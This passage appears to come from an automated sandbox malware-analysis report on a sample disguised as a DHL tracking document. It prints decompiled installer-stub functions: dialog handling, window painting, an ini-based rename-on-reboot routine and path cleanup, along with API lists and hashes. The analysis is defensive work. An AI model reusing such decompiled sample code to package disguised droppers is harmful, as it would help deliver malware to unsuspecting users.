                    							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                    							__eflags =  *0x423f2c - _t133; // 0x0
                    							if(__eflags == 0) {
                    								_push( *0x420490);
                    							} else {
                    								SendMessageA(_t125, 0x401, 2, _t133);
                    								_push( *0x41f458);
                    							}
                    							E00403E6C();
                    							E00405A85(0x420498, "nkdpnsqeoocyepqnevm Setup");
                    							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                    							SetWindowTextA(_t125, 0x420498);
                    							_push(_t133);
                    							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								continue;
                    							} else {
                    								__eflags =  *_t130 - _t133;
                    								if( *_t130 == _t133) {
                    									continue;
                    								}
                    								__eflags =  *(_t130 + 4) - 5;
                    								if( *(_t130 + 4) != 5) {
                    									DestroyWindow( *0x423678);
                    									 *0x41fc68 = _t130;
                    									__eflags =  *_t130 - _t133;
                    									if( *_t130 <= _t133) {
                    										goto L58;
                    									}
                    									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                    									__eflags = _t73 - _t133;
                    									 *0x423678 = _t73;
                    									if(_t73 == _t133) {
                    										goto L58;
                    									}
                    									_push( *((intOrPtr*)(_t130 + 0x2c)));
                    									_push(6);
                    									E00403E37(_t73);
                    									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                    									ScreenToClient(_t125, _t134 + 0x10);
                    									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                    									_push(_t133);
                    									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                    									__eflags =  *0x42366c - _t133; // 0x0
                    									if(__eflags != 0) {
                    										goto L61;
                    									}
                    									ShowWindow( *0x423678, 8);
                    									E00403E83(0x405);
                    									goto L58;
                    								}
                    								__eflags =  *0x423f2c - _t133; // 0x0
                    								if(__eflags != 0) {
                    									goto L61;
                    								}
                    								__eflags =  *0x423f20 - _t133; // 0x0
                    								if(__eflags != 0) {
                    									continue;
                    								}
                    								goto L61;
                    							}
                    						}
                    						DestroyWindow( *0x423678);
                    						 *0x423ea8 = _t133;
                    						EndDialog(_t125,  *0x41f860);
                    						goto L58;
                    					} else {
                    						__eflags = _t35 - 1;
                    						if(_t35 != 1) {
                    							L33:
                    							__eflags =  *_t130 - _t133;
                    							if( *_t130 == _t133) {
                    								goto L61;
                    							}
                    							goto L34;
                    						}
                    						_push(0);
                    						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                    						__eflags = _t86;
                    						if(_t86 == 0) {
                    							goto L33;
                    						}
                    						SendMessageA( *0x423678, 0x40f, 0, 1);
                    						__eflags =  *0x42366c - _t133; // 0x0
                    						return 0 | __eflags == 0x00000000;
                    					}
                    				} else {
                    					_t125 = _a4;
                    					_t133 = 0;
                    					if(_t115 == 0x47) {
                    						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                    					}
                    					if(_t115 == 5) {
                    						asm("sbb eax, eax");
                    						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                    					}
                    					if(_t115 != 0x40d) {
                    						__eflags = _t115 - 0x11;
                    						if(_t115 != 0x11) {
                    							__eflags = _t115 - 0x111;
                    							if(_t115 != 0x111) {
                    								L26:
                    								return E00403E9E(_t115, _a12, _a16);
                    							}
                    							_t132 = _a12 & 0x0000ffff;
                    							_t126 = GetDlgItem(_t125, _t132);
                    							__eflags = _t126 - _t133;
                    							if(_t126 == _t133) {
                    								L13:
                    								__eflags = _t132 - 1;
                    								if(_t132 != 1) {
                    									__eflags = _t132 - 3;
                    									if(_t132 != 3) {
                    										_t127 = 2;
                    										__eflags = _t132 - _t127;
                    										if(_t132 != _t127) {
                    											L25:
                    											SendMessageA( *0x423678, 0x111, _a12, _a16);
                    											goto L26;
                    										}
                    										__eflags =  *0x423f2c - _t133; // 0x0
                    										if(__eflags == 0) {
                    											_t99 = E0040140B(3);
                    											__eflags = _t99;
                    											if(_t99 != 0) {
                    												goto L26;
                    											}
                    											 *0x41f860 = 1;
                    											L21:
                    											_push(0x78);
                    											L22:
                    											E00403E10();
                    											goto L26;
                    										}
                    										E0040140B(_t127);
                    										 *0x41f860 = _t127;
                    										goto L21;
                    									}
                    									__eflags =  *0x4091bc - _t133; // 0xffffffff
                    									if(__eflags <= 0) {
                    										goto L25;
                    									}
                    									_push(0xffffffff);
                    									goto L22;
                    								}
                    								_push(_t132);
                    								goto L22;
                    							}
                    							SendMessageA(_t126, 0xf3, _t133, _t133);
                    							_t103 = IsWindowEnabled(_t126);
                    							__eflags = _t103;
                    							if(_t103 == 0) {
                    								goto L61;
                    							}
                    							goto L13;
                    						}
                    						SetWindowLongA(_t125, _t133, _t133);
                    						return 1;
                    					} else {
                    						DestroyWindow( *0x423678);
                    						 *0x423678 = _a12;
                    						L58:
                    						if( *0x421498 == _t133) {
                    							_t142 =  *0x423678 - _t133; // 0x0
                    							if(_t142 != 0) {
                    								ShowWindow(_t125, 0xa);
                    								 *0x421498 = 1;
                    							}
                    						}
                    						L61:
                    						return 0;
                    					}
                    				}
                    			}

































                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                    • ShowWindow.USER32(?), ref: 004039BD
                    • DestroyWindow.USER32 ref: 004039D1
                    • SetWindowLongA.USER32 ref: 004039ED
                    • GetDlgItem.USER32 ref: 00403A0E
                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                    • IsWindowEnabled.USER32(00000000), ref: 00403A29
                    • GetDlgItem.USER32 ref: 00403AD7
                    • GetDlgItem.USER32 ref: 00403AE1
                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                    • GetDlgItem.USER32 ref: 00403BF2
                    • ShowWindow.USER32(00000000,?), ref: 00403C13
                    • EnableWindow.USER32(?,?), ref: 00403C25
                    • EnableWindow.USER32(?,?), ref: 00403C40
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                    • EnableMenuItem.USER32 ref: 00403C5D
                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                    • lstrlenA.KERNEL32(00420498,?,00420498,nkdpnsqeoocyepqnevm Setup), ref: 00403CB1
                    • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                    • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                    Strings
                    • nkdpnsqeoocyepqnevm Setup, xrefs: 00403CA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                    • String ID: nkdpnsqeoocyepqnevm Setup
                    • API String ID: 184305955-110773848
                    • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                    • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                    • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                    • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                    				char _v8;
                    				signed int _v12;
                    				void* _v16;
                    				struct HWND__* _t52;
                    				intOrPtr _t71;
                    				intOrPtr _t85;
                    				long _t86;
                    				int _t98;
                    				struct HWND__* _t99;
                    				signed int _t100;
                    				intOrPtr _t103;
                    				intOrPtr _t107;
                    				intOrPtr _t109;
                    				int _t110;
                    				signed int* _t112;
                    				signed int _t113;
                    				char* _t114;
                    				CHAR* _t115;
                    
                    				if(_a8 != 0x110) {
                    					if(_a8 != 0x111) {
                    						L11:
                    						if(_a8 != 0x4e) {
                    							if(_a8 == 0x40b) {
                    								 *0x420478 =  *0x420478 + 1;
                    							}
                    							L25:
                    							_t110 = _a16;
                    							L26:
                    							return E00403E9E(_a8, _a12, _t110);
                    						}
                    						_t52 = GetDlgItem(_a4, 0x3e8);
                    						_t110 = _a16;
                    						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                    							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                    							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                    							_v12 = _t100;
                    							_v16 = _t109;
                    							_v8 = 0x422e40;
                    							if(_t100 - _t109 < 0x800) {
                    								SendMessageA(_t52, 0x44b, 0,  &_v16);
                    								SetCursor(LoadCursorA(0, 0x7f02));
                    								_t40 =  &_v8; // 0x422e40
                    								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                    								SetCursor(LoadCursorA(0, 0x7f00));
                    								_t110 = _a16;
                    							}
                    						}
                    						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                    							goto L26;
                    						} else {
                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                    								SendMessageA( *0x423ea8, 0x111, 1, 0);
                    							}
                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                    								SendMessageA( *0x423ea8, 0x10, 0, 0);
                    							}
                    							return 1;
                    						}
                    					}
                    					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                    						goto L25;
                    					} else {
                    						_t103 =  *0x41fc68; // 0x0
                    						_t25 = _t103 + 0x14; // 0x14
                    						_t112 = _t25;
                    						if(( *_t112 & 0x00000020) == 0) {
                    							goto L25;
                    						}
                    						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                    						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                    						E0040420A();
                    						goto L11;
                    					}
                    				}
                    				_t98 = _a16;
                    				_t113 =  *(_t98 + 0x30);
                    				if(_t113 < 0) {
                    					_t107 =  *0x42367c; // 0x5169b1
                    					_t113 =  *(_t107 - 4 + _t113 * 4);
                    				}
                    				_t71 =  *0x423ed8; // 0x514f2c
                    				_push( *((intOrPtr*)(_t98 + 0x34)));
                    				_t114 = _t113 + _t71;
                    				_push(0x22);
                    				_a16 =  *_t114;
                    				_v12 = _v12 & 0x00000000;
                    				_t115 = _t114 + 1;
                    				_v16 = _t115;
                    				_v8 = E00403F4B;
                    				E00403E37(_a4);
                    				_push( *((intOrPtr*)(_t98 + 0x38)));
                    				_push(0x23);
                    				E00403E37(_a4);
                    				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                    				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                    				_t99 = GetDlgItem(_a4, 0x3e8);
                    				E00403E6C(_t99);
                    				SendMessageA(_t99, 0x45b, 1, 0);
                    				_t85 =  *0x423eb0; // 0x50f930
                    				_t86 =  *(_t85 + 0x68);
                    				if(_t86 < 0) {
                    					_t86 = GetSysColor( ~_t86);
                    				}
                    				SendMessageA(_t99, 0x443, 0, _t86);
                    				SendMessageA(_t99, 0x445, 0, 0x4010000);
                    				 *0x41f45c =  *0x41f45c & 0x00000000;
                    				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                    				SendMessageA(_t99, 0x449, _a16,  &_v16);
                    				 *0x420478 =  *0x420478 & 0x00000000;
                    				return 0;
                    			}






















                    APIs
                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                    • GetDlgItem.USER32 ref: 0040401E
                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                    • GetSysColor.USER32(?), ref: 0040404D
                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                    • lstrlenA.KERNEL32(?), ref: 00404075
                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                    • GetDlgItem.USER32 ref: 004040F5
                    • SendMessageA.USER32(00000000), ref: 004040F8
                    • GetDlgItem.USER32 ref: 00404123
                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                    • LoadCursorA.USER32 ref: 00404172
                    • SetCursor.USER32(00000000), ref: 0040417B
                    • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                    • LoadCursorA.USER32 ref: 0040419B
                    • SetCursor.USER32(00000000), ref: 0040419E
                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                    • String ID: ,OQ$@.B$N$open
                    • API String ID: 3615053054-1034421876
                    • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                    • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                    • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                    • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                    				struct tagLOGBRUSH _v16;
                    				struct tagRECT _v32;
                    				struct tagPAINTSTRUCT _v96;
                    				struct HDC__* _t70;
                    				struct HBRUSH__* _t87;
                    				struct HFONT__* _t94;
                    				long _t102;
                    				intOrPtr _t115;
                    				signed int _t126;
                    				struct HDC__* _t128;
                    				intOrPtr _t130;
                    
                    				if(_a8 == 0xf) {
                    					_t130 =  *0x423eb0; // 0x50f930
                    					_t70 = BeginPaint(_a4,  &_v96);
                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                    					_a8 = _t70;
                    					GetClientRect(_a4,  &_v32);
                    					_t126 = _v32.bottom;
                    					_v32.bottom = _v32.bottom & 0x00000000;
                    					while(_v32.top < _t126) {
                    						_a12 = _t126 - _v32.top;
                    						asm("cdq");
                    						asm("cdq");
                    						asm("cdq");
                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                    						_t87 = CreateBrushIndirect( &_v16);
                    						_v32.bottom = _v32.bottom + 4;
                    						_a16 = _t87;
                    						FillRect(_a8,  &_v32, _t87);
                    						DeleteObject(_a16);
                    						_v32.top = _v32.top + 4;
                    					}
                    					if( *(_t130 + 0x58) != 0xffffffff) {
                    						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                    						_a16 = _t94;
                    						if(_t94 != 0) {
                    							_t128 = _a8;
                    							_v32.left = 0x10;
                    							_v32.top = 8;
                    							SetBkMode(_t128, 1);
                    							SetTextColor(_t128,  *(_t130 + 0x58));
                    							_a8 = SelectObject(_t128, _a16);
                    							DrawTextA(_t128, "nkdpnsqeoocyepqnevm Setup", 0xffffffff,  &_v32, 0x820);
                    							SelectObject(_t128, _a8);
                    							DeleteObject(_a16);
                    						}
                    					}
                    					EndPaint(_a4,  &_v96);
                    					return 0;
                    				}
                    				_t102 = _a16;
                    				if(_a8 == 0x46) {
                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                    					_t115 =  *0x423ea8; // 0x0
                    					 *((intOrPtr*)(_t102 + 4)) = _t115;
                    				}
                    				return DefWindowProcA(_a4, _a8, _a12, _t102);
                    			}















                    APIs
                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextA.USER32(00000000,nkdpnsqeoocyepqnevm Setup,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F$nkdpnsqeoocyepqnevm Setup
                    • API String ID: 941294808-1318374105
                    • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                    • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                    • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                    • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E004057D3() {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t15;
                    				long _t16;
                    				intOrPtr _t18;
                    				int _t20;
                    				void* _t28;
                    				long _t29;
                    				intOrPtr* _t37;
                    				int _t43;
                    				void* _t44;
                    				long _t47;
                    				CHAR* _t49;
                    				void* _t51;
                    				void* _t53;
                    				intOrPtr* _t54;
                    				void* _t55;
                    				void* _t56;
                    
                    				_t15 = E00405DA3(1);
                    				_t49 =  *(_t55 + 0x18);
                    				if(_t15 != 0) {
                    					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                    					if(_t20 != 0) {
                    						L16:
                    						 *0x423f30 =  *0x423f30 + 1;
                    						return _t20;
                    					}
                    				}
                    				 *0x422628 = 0x4c554e;
                    				if(_t49 == 0) {
                    					L5:
                    					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                    					if(_t16 != 0 && _t16 <= 0x400) {
                    						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                    						_t18 =  *0x423eb0; // 0x50f930
                    						_t56 = _t55 + 0x10;
                    						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
                    						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                    						_t53 = _t20;
                    						 *(_t56 + 0x14) = _t53;
                    						if(_t53 == 0xffffffff) {
                    							goto L16;
                    						}
                    						_t47 = GetFileSize(_t53, 0);
                    						_t7 = _t43 + 0xa; // 0xa
                    						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                    						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                    							L15:
                    							_t20 = CloseHandle(_t53);
                    							goto L16;
                    						} else {
                    							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                    								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                    								if(_t28 == 0) {
                    									L13:
                    									_t29 = _t47;
                    									L14:
                    									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                    									SetFilePointer(_t53, 0, 0, 0);
                    									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                    									GlobalFree(_t51);
                    									goto L15;
                    								}
                    								_t37 = _t28 + 1;
                    								_t44 = _t51 + _t47;
                    								_t54 = _t37;
                    								if(_t37 >= _t44) {
                    									L21:
                    									_t53 =  *(_t56 + 0x14);
                    									_t29 = _t37 - _t51;
                    									goto L14;
                    								} else {
                    									goto L20;
                    								}
                    								do {
                    									L20:
                    									 *((char*)(_t43 + _t54)) =  *_t54;
                    									_t54 = _t54 + 1;
                    								} while (_t54 < _t44);
                    								goto L21;
                    							}
                    							E00405A85(_t51 + _t47, "[Rename]\r\n");
                    							_t47 = _t47 + 0xa;
                    							goto L13;
                    						}
                    					}
                    				} else {
                    					CloseHandle(E0040575C(_t49, 0, 1));
                    					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                    					if(_t16 != 0 && _t16 <= 0x400) {
                    						goto L5;
                    					}
                    				}
                    				return _t16;
                    			}

                    APIs
                      • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                    • GetShortPathNameA.KERNEL32 ref: 00405829
                    • GetShortPathNameA.KERNEL32 ref: 00405846
                    • wsprintfA.USER32 ref: 00405864
                    • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                    • GlobalFree.KERNEL32 ref: 00405923
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                      • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                      • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                    • String ID: %s=%s$(&B$[Rename]
                    • API String ID: 3772915668-1834469719
                    • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                    • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                    • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                    • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405CE3(CHAR* _a4) {
                    				char _t5;
                    				char _t7;
                    				char* _t15;
                    				char* _t16;
                    				CHAR* _t17;
                    
                    				_t17 = _a4;
                    				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                    					_t17 =  &(_t17[4]);
                    				}
                    				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                    					_t17 =  &(_t17[2]);
                    				}
                    				_t5 =  *_t17;
                    				_t15 = _t17;
                    				_t16 = _t17;
                    				if(_t5 != 0) {
                    					do {
                    						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                    							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                    							_t16 = CharNextA(_t16);
                    						}
                    						_t17 = CharNextA(_t17);
                    						_t5 =  *_t17;
                    					} while (_t5 != 0);
                    				}
                    				 *_t16 =  *_t16 & 0x00000000;
                    				while(1) {
                    					_t16 = CharPrevA(_t15, _t16);
                    					_t7 =  *_t16;
                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                    						break;
                    					}
                    					 *_t16 =  *_t16 & 0x00000000;
                    					if(_t15 < _t16) {
                    						continue;
                    					}
                    					break;
                    				}
                    				return _t7;
                    			}

                    APIs
                    • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
